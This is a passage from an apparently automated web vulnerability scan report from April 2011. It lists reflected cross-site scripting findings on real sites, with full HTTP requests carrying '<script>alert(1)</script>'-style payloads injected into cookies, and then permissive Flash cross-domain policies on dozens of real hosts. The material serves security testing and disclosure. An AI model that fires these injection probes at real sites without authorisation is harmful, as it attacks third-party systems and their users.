P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&dedf1<script>alert(1)</script>6a1a09355da', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Th
...[SNIP]...

5.64. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload d5a27<script>alert(1)</script>214694deac1 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:27 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741407; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

5.65. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload e2a7a<script>alert(1)</script>9043e21f1f9 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&e2a7a<script>alert(1)</script>9043e21f1f9=&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...

5.66. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9ba92<script>alert(1)</script>e69fd29fdd1 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=19ba92<script>alert(1)</script>e69fd29fdd1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:30 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741410; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '19ba92<script>alert(1)</script>e69fd29fdd1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...

5.67. http://forums.manageengine.com/fbw [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22270"><script>alert(1)</script>5970609d8e4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 25959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<input type="hidden" id="zdrpn" name="zdrpn" value="067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4">
...[SNIP]...

5.68. http://forums.manageengine.com/fbw [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd770"-alert(1)-"80d1da2beeb was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 25914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<script>
//For I18N
var zuid = "-1";
var csrfParamName = "zdrpn";
var csrfToken = "067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb";
var i18n = new Array();
i18n["zohodiscussions.settings.PleaseEnteravalue"]="The input field is empty!";
i18n["zohodiscussions.generalmessage.enteraValidemailaddre
...[SNIP]...

6. Flash cross-domain policy previous next
There are 49 instances of this issue:

http://195.68.160.134/crossdomain.xml
http://195.68.160.166/crossdomain.xml
http://195.68.160.167/crossdomain.xml
http://195.68.160.40/crossdomain.xml
http://195.68.160.95/crossdomain.xml
http://ad.afy11.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://api.facebook.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://beacon.securestudies.com/crossdomain.xml
http://bs.mail.ru/crossdomain.xml
http://bs.yandex.ru/crossdomain.xml
http://cdn-01.yumenetworks.com/crossdomain.xml
http://counter.rambler.ru/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://event.adxpose.com/crossdomain.xml
http://games.mochiads.com/crossdomain.xml
http://goods.adnectar.com/crossdomain.xml
http://goods43.adnectar.com/crossdomain.xml
http://img.en25.com/crossdomain.xml
http://learn.shavlik.com/crossdomain.xml
http://m.adnxs.com/crossdomain.xml
http://map.media6degrees.com/crossdomain.xml
http://mbox5.offermatica.com/crossdomain.xml
http://pda.loveplanet.ru/crossdomain.xml
http://pixel.fetchback.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://pl.yumenetworks.com/crossdomain.xml
http://playspal.com/crossdomain.xml
http://pretty.ru/crossdomain.xml
http://r2.mail.ru/crossdomain.xml
http://rbcgaru.hit.gemius.pl/crossdomain.xml
http://rs.mail.ru/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://search.twitter.com/crossdomain.xml
http://widgets.fotocash.ru/crossdomain.xml
http://gomail.radar.imgsmail.ru/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://imagesrv.gartner.com/crossdomain.xml
http://img.dt00.net/crossdomain.xml
http://img.imgsmail.ru/crossdomain.xml
http://img.mail.ru/crossdomain.xml
http://js.dt00.net/crossdomain.xml
http://mail.radar.imgsmail.ru/crossdomain.xml
http://mail.ru/crossdomain.xml
http://odnoklassniki.ru/crossdomain.xml
http://oth.dt00.net/crossdomain.xml
http://www.gartner.com/crossdomain.xml
http://www.livejournal.com/crossdomain.xml

6.1. http://195.68.160.134/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.134
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.134

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:37 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 07 Nov 2008 04:42:33 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:37 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.2. http://195.68.160.166/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.166
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.166

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:26:43 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:26:43 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.3. http://195.68.160.167/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.167
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.167

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:38 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:55 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:38 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.4. http://195.68.160.40/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.40
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.40

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:57 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:57 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.5. http://195.68.160.95/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.95
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.95

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:41 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:41 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.6. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.7. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://api.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.72.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.9. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.10. http://beacon.securestudies.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.11. http://bs.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:29:05 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.12. http://bs.yandex.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.yandex.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
